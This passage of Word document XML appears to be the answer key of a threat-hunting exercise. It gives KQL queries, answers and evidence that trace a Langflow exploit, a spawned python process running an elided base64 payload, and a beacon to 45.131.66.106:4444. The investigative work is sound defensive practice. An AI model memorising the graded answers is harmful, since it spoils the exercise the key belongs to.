      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Query:</w:t>
      </w:r>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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="180" w:type="dxa"/>
              <w:top w:w="120" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">LLMAgentLogs_CL</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| where actor == "jadepuffer-agent"</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| project TimeGenerated, actor, session_id, model_response, tool_name, tool_result</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| order by TimeGenerated asc</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="999999" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:left w:w="150" w:type="dxa"/>
              <w:top w:w="260" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
              <w:bottom w:w="260" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="58B58EB6">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r/>
            <w:r>
              <mc:AlternateContent>
                <mc:Choice Requires="wpg">
                  <w:drawing>
                    <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                      <wp:extent cx="5943600" cy="887599"/>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03956" name=""/>
                              <pic:cNvPicPr>
                                <a:picLocks noChangeAspect="1"/>
                              </pic:cNvPicPr>
                              <pic:nvPr/>
                            </pic:nvPicPr>
                            <pic:blipFill rotWithShape="1">
                              <a:blip r:embed="rId10"/>
                              <a:stretch/>
                            </pic:blipFill>
                            <pic:spPr bwMode="auto">
                              <a:xfrm rot="0" flipH="0" flipV="0">
                                <a:off x="0" y="0"/>
                                <a:ext cx="5943600" cy="8875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69.89pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;rotation:0;z-index:1;" stroked="false">
                      <v:imagedata r:id="rId10" o:title=""/>
                      <o:lock v:ext="edit" rotation="t"/>
                    </v:shape>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r/>
            <w:r/>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="708"/>
        <w:pBdr/>
        <w:spacing w:after="80" w:before="200"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Q3</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Question: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Which external address made that request?</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Answer: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">64.20.53.230</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Same Syslog record as Q1, the src field.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Query:</w:t>
      </w:r>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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="180" w:type="dxa"/>
              <w:top w:w="120" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="2F009303">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Syslog</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="050D206D">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| where Computer == "ff-lf-01"</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="63A8D793">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| where TimeGenerated between (datetime(2026-07-30T19:15:00Z) .. datetime(2026-07-30T19:25:00Z))</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="75503727">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| project TimeGenerated, ProcessName, SyslogMessage</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| order by TimeGenerated asc</w:t>
            </w:r>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="999999" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:left w:w="150" w:type="dxa"/>
              <w:top w:w="260" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
              <w:bottom w:w="260" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="409A2BB8">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r/>
            <w:r>
              <mc:AlternateContent>
                <mc:Choice Requires="wpg">
                  <w:drawing>
                    <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                      <wp:extent cx="5943600" cy="1112566"/>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50066" name=""/>
                              <pic:cNvPicPr>
                                <a:picLocks noChangeAspect="1"/>
                              </pic:cNvPicPr>
                              <pic:nvPr/>
                            </pic:nvPicPr>
                            <pic:blipFill rotWithShape="1">
                              <a:blip r:embed="rId11"/>
                              <a:stretch/>
                            </pic:blipFill>
                            <pic:spPr bwMode="auto">
                              <a:xfrm rot="0" flipH="0" flipV="0">
                                <a:off x="0" y="0"/>
                                <a:ext cx="5943600" cy="11125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87.60pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;rotation:0;z-index:1;" stroked="false">
                      <v:imagedata r:id="rId11" o:title=""/>
                      <o:lock v:ext="edit" rotation="t"/>
                    </v:shape>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r/>
            <w:r/>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="708"/>
        <w:pBdr/>
        <w:spacing w:after="80" w:before="200"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Q4</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Question: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Name the process that was started and the process that started it.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Answer: </w:t>
      </w:r>
      <w:r/>
      <w:r>
        <w:t xml:space="preserve">python3.11, langflow run</w:t>
      </w:r>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">LinuxProcess_CL, 19:20:04. The Langflow service process (PID 3201, langflow run --host 0.0.0.0 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">--port 7860) spawns a new python3.11 process (PID 4471) running python3 -c &lt;base64 payload&gt;, four seconds after the exploit request. Ruled out a user logon or cron job as the parent by checking LinuxAuth_CL and LinuxSystem_CL for anything adjacent in time.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Query:</w:t>
      </w:r>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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="180" w:type="dxa"/>
              <w:top w:w="120" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="5955EDC7">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">LinuxProcess_CL </w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="4D69FDEC">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| where DvcHostname =~ "ff-lf-01" and TargetProcessName =~ "python3.11" </w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| project TargetProcessName, ActingProcessCommandLine</w:t>
            </w:r>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="999999" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:left w:w="150" w:type="dxa"/>
              <w:top w:w="260" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
              <w:bottom w:w="260" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="5A87C408">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r/>
            <w:r>
              <mc:AlternateContent>
                <mc:Choice Requires="wpg">
                  <w:drawing>
                    <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                      <wp:extent cx="5572125" cy="255270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2761" name=""/>
                              <pic:cNvPicPr>
                                <a:picLocks noChangeAspect="1"/>
                              </pic:cNvPicPr>
                              <pic:nvPr/>
                            </pic:nvPicPr>
                            <pic:blipFill rotWithShape="1">
                              <a:blip r:embed="rId12"/>
                              <a:stretch/>
                            </pic:blipFill>
                            <pic:spPr bwMode="auto">
                              <a:xfrm rot="0" flipH="0" flipV="0">
                                <a:off x="0" y="0"/>
                                <a:ext cx="5572125" cy="2552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38.75pt;height:201.00pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;rotation:0;z-index:1;" stroked="false">
                      <v:imagedata r:id="rId12" o:title=""/>
                      <o:lock v:ext="edit" rotation="t"/>
                    </v:shape>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r/>
            <w:r/>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="708"/>
        <w:pBdr/>
        <w:spacing w:after="80" w:before="200"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Q5</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Question: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">A colleague concludes the payload was fileless, because its process event carries no SHA256. Confirm or refute.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Answer: </w:t>
      </w:r>
      <w:r/>
      <w:r>
        <w:t xml:space="preserve">No, 0 of 1,182 process events have a non-empty TargetProcessSHA256. The field is always empty, so its absence proves nothing about this specific payload; it's a sensor/collection gap, not evidence of fileless execution.</w:t>
      </w:r>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Query:</w:t>
      </w:r>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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="180" w:type="dxa"/>
              <w:top w:w="120" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="616AF8AD">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">LinuxProcess_CL</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| summarize Total = count(), HashPopulated = countif(isnotempty(TargetProcessSHA256))</w:t>
            </w:r>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="999999" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:left w:w="150" w:type="dxa"/>
              <w:top w:w="260" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
              <w:bottom w:w="260" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="671C4D9A">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r/>
            <w:r>
              <mc:AlternateContent>
                <mc:Choice Requires="wpg">
                  <w:drawing>
                    <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                      <wp:extent cx="2743200" cy="119062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45017" name=""/>
                              <pic:cNvPicPr>
                                <a:picLocks noChangeAspect="1"/>
                              </pic:cNvPicPr>
                              <pic:nvPr/>
                            </pic:nvPicPr>
                            <pic:blipFill rotWithShape="1">
                              <a:blip r:embed="rId13"/>
                              <a:stretch/>
                            </pic:blipFill>
                            <pic:spPr bwMode="auto">
                              <a:xfrm rot="0" flipH="0" flipV="0">
                                <a:off x="0" y="0"/>
                                <a:ext cx="2743200" cy="11906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16.00pt;height:93.75pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;rotation:0;z-index:1;" stroked="false">
                      <v:imagedata r:id="rId13" o:title=""/>
                      <o:lock v:ext="edit" rotation="t"/>
                    </v:shape>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r/>
            <w:r/>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="707"/>
        <w:pBdr/>
        <w:spacing w:after="100" w:before="240"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Section 2: Command and Control</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="708"/>
        <w:pBdr/>
        <w:spacing w:after="80" w:before="200"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Q1</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Question: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Where is it calling, and on which port?</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Answer: </w:t>
      </w:r>
      <w:r/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">45.131.66.106:4444</w:t>
      </w:r>
      <w:r/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Syslog, 19:22:04, outbound beacon to 45.131.66.106:4444. Confirmed independently in LinuxNetwork_CL, DstIpAddr 45.131.66.106, DstPortNumber 4444, ActingProcessId 4471. Ruled out 104.16.132.229:8080 as unrelated legitimate traffic.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Query:</w:t>
      </w:r>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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="180" w:type="dxa"/>
              <w:top w:w="120" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="2E244E10">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
